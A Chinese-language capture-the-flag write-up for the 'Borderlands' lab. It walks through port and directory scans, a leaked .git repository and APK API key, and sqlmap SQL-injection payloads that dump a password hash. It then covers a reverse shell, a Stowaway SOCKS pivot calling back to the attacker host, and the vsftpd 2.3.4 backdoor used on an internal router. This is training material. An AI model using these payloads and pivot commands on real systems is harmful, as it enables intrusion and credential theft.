Borderlands
端口扫描
root@ip-10-10-148-104:~/borderlands# nmap -sTCV -p- --min-rate 1000 10.10.185.102
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-31 15:37 GMT
Nmap scan report for ip-10-10-185-102.eu-west-1.compute.internal (10.10.185.102)
Host is up (0.00040s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 87:f5:83:ff:68:2d:53:9a:b5:1b:b4:53:0f:dd:e4:23 (RSA)
| 256 94:84:76:1d:26:d4:8b:74:f1:c3:9e:dc:8b:0a:73:bb (ECDSA)
|_ 256 9f:a7:9c:39:f8:dd:76:34:b6:6d:07:13:99:ad:05:3e (EdDSA)
80/tcp open http nginx 1.14.0 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.10.185.102:80/.git/
| Git repository found!
| .git/config matched patterns 'user'
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: added mobile apk for beta testing.
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Context Information Security - HackBack 2
8080/tcp closed http-proxy
MAC Address: 02:D2:B4:91:77:A5 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.56 seconds
80
root@ip-10-10-148-104:~/borderlands# feroxbuster -u http://10.10.185.102/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
404 GET 7l 13w 178c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 11w 178c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 9l 85w 15227c http://10.10.185.102/index.php
302 GET 0l 0w 0c http://10.10.185.102/home.php => index.php
200 GET 364l 2694w 89151c http://10.10.185.102/Context_White_Paper_Pen_Test_101.pdf
200 GET 1l 3w 15c http://10.10.185.102/api.php
200 GET 2292l 14163w 943202c http://10.10.185.102/CTX_WSUSpect_White_Paper.pdf
200 GET 928l 4779w 80534c http://10.10.185.102/info.php
200 GET 0l 0w 0c http://10.10.185.102/functions.php
200 GET 3965l 21467w 1412748c http://10.10.185.102/Context_Red_Teaming_Guide.pdf
200 GET 7887l 42576w 3866144c http://10.10.185.102/mobile-app-prototype.apk
200 GET 5158l 80691w 1610299c http://10.10.185.102/Glibc_Adventures-The_Forgotten_Chunks.pdf
200 GET 0l 0w 1963179c http://10.10.185.102/Demystifying_the_Exploit_Kit_-_Context_White_Paper.pdf
200 GET 9l 85w 15227c http://10.10.185.102/
[####################] - 69s 882224/882224 0s found:12 errors:4
[####################] - 69s 882184/882184 12869/s http://10.10.185.102/
- 查看四个 PDF 也没有发现什么
- 从端口扫描结果中发现存在
.git泄露,下载发现就是网站目录 - 发现一个 apk 程序将其下载到本地
对其进行分析:
- 查看
.git文件这是网站的源码文件, 通过对其进行分析, 我发现在api.php存在 sqli 漏洞, 所以我们可以借此来实现 sqli 注入 - 对于
apk文件 , 可以前往 Decompilers online 进行反编译, 我们可以在其中的 Main2Activity.java 中发现上面的 sqli 漏洞
对于 sqli 漏洞我们首先需要构造链接, 因为从代码分析角度发现其后端会校验 apikey, 所以构造 url
http://10.10.201.64/api.php?documentid=1&apikey=WEBLhvOJAH8d50Z4y5G5
- 进行 sqli 漏洞利用
- 读取到一个 user 表其中得到一个用户账号, 虽然可以解密但是没有什么用
- 这里允许我们使用 sqli 来获取一个 Shell
root@ip-10-10-235-60:~# sqlmap -r borderlands/sql.txt --risk 3 --level 3
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: http://10.10.201.64:80/api.php?documentid=(SELECT 2519 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT (ELT(2519=2519,1))),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&apikey=WEBLhvOJAH8d50Z4y5G5
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://10.10.201.64:80/api.php?documentid=(CASE WHEN (5839=5839) THEN SLEEP(5) ELSE 5839 END)&apikey=WEBLhvOJAH8d50Z4y5G5
Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: http://10.10.201.64:80/api.php?documentid=-2327 UNION ALL SELECT 8036,CONCAT(0x71786b6a71,0x4b73444c796c6a574b7244796e744f435745714a786943574c6c73684872496b714670695479716d,0x7170627171),8036-- OiiK&apikey=WEBLhvOJAH8d50Z4y5G5
---
// 通过 sqli 注入获取到用户名可惜是加密内容, 但是从源码中��我们得到了 solt 我们可以进行解密
root@ip-10-10-235-60:~# sqlmap -r borderlands/sql.txt --risk 3 --level 3 -D myfirstwebsite -T users --dump
+--------+----------+--------------------------------------------------------------+
| userid | username | password |
+--------+----------+--------------------------------------------------------------+
| 1 | billg | $2y$10$wWeyIzGcD7TVwZ7y7d3UCO5eEssZShTQzBU2yIebvvQQw1y676zVW |
+--------+----------+--------------------------------------------------------------+
后渗透
www-data (172.18.0.2/172.16.1.10)
利用 sqli 来获取一个 Shell, 并进行获取反向 Shell
之后因为没有找到提权的地方我上传了 linpeas.sh 来进行操作 , 从中获取到一些关键信息
- 存在多个网段, 结合上面��的网络拓扑来看我们要进行端口转发了
- 上传 nmap 对发现的主机网络进行扫描
# 网络信息
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
17: eth0@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
valid_lft forever preferred_lft forever
23: eth1@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
link/ether 02:42:ac:10:01:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.16.1.10/24 brd 172.16.1.255 scope global eth1
valid_lft forever preferred_lft forever
# 进行端口扫描
(remote) [email protected]:/tmp$ ./nmap -sT -p- --min-rate 1000 172.16.1.10/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-11-04 04:23 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for app.ctx.ctf (172.16.1.10)
Host is up (0.00012s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for hackback_router1_1.hackback_r_1_ext (172.16.1.128)
Host is up (0.00015s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
179/tcp open bgp
2601/tcp open zebra
2605/tcp open bgpd
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.07 seconds
(remote) [email protected]:/tmp$ ./nmap -sT -p- --min-rate 1000 172.18.0.2/16
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-11-04 04:24 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:06:19 elapsed; 65534 hosts completed (2 up), 2 undergoing Connect Scan
Connect Scan Timing: About 75.59% done; ETC: 04:31 (0:00:19 remaining)
Nmap scan report for ip-172-18-0-1.eu-west-1.compute.internal (172.18.0.1)
Host is up (0.00042s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-alt
Nmap scan report for app.ctx.ctf (172.18.0.2)
Host is up (0.00012s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 65536 IP addresses (2 hosts up) scanned in 420.52 seconds
www-data(172.18.0.2/172.16.1.10) —> root(172.16.1.128 Router1)
在这里我使用了Stowaway 此工具来进行端口转发
- 上传需要使用的工具
- 在攻击端执行 :
./linux_x86_admin -l 9999 - 靶机端执行 :
./linux_x86_agent -c 10.10.235.60:9999 - 连接成功后, 选择对应的节点执行 :
socks 8888, 现在我们就可以通过 127.0.0.1:8888 来和我们的主机进行连接了
因为在172.16.1.128 发现存在 FTP 服务, 同时我发现其版本为 : (vsFTPd 2.3.4) 此版本对应的存在一个漏洞, vsftpd 2.3.4 - Backdoor Command Execution 之后我们利用此来进行连接
tip
💡 从网络拓扑来看我们进入了 Router1
在此处进行信息收集获取到网络信息:
ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:10:0C:65
inet addr:172.16.12.101 Bcast:172.16.12.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:600 errors:0 dropped:0 overruns:0 frame:0
TX packets:547 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:36273 (35.4 KiB) TX bytes:32769 (32.0 KiB)
eth1 Link encap:Ethernet HWaddr 02:42:AC:10:01:80
inet addr:172.16.1.128 Bcast:172.16.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:66351 errors:0 dropped:0 overruns:0 frame:0
TX packets:65584 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4895924 (4.6 MiB) TX bytes:3544535 (3.3 MiB)
eth2 Link encap:Ethernet HWaddr 02:42:AC:10:1F:65
inet addr:172.16.31.101 Bcast:172.16.31.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:573 errors:0 dropped:0 overruns:0 frame:0
TX packets:567 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:34417 (33.6 KiB) TX bytes:34041 (33.2 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
同时执行 arp 命令我获取到其他两个主机的 IP 地址:
arp
hackback_app_1.hackback_r_1_ext (172.16.1.10) at 02:42:ac:10:01:0a [ether] on eth1
hackback_router3_1.hackback_r_3_1 (172.16.31.103) at 02:42:ac:10:1f:67 [ether] on eth2
hackback_router2_1.hackback_r_1_2 (172.16.12.102) at 02:42:ac:10:0c:66 [ether] on eth0
之后的内容就不再是端口转发, 有点类似于配置路由, 收集其他网络流量了, 我不太看得懂就不再赘述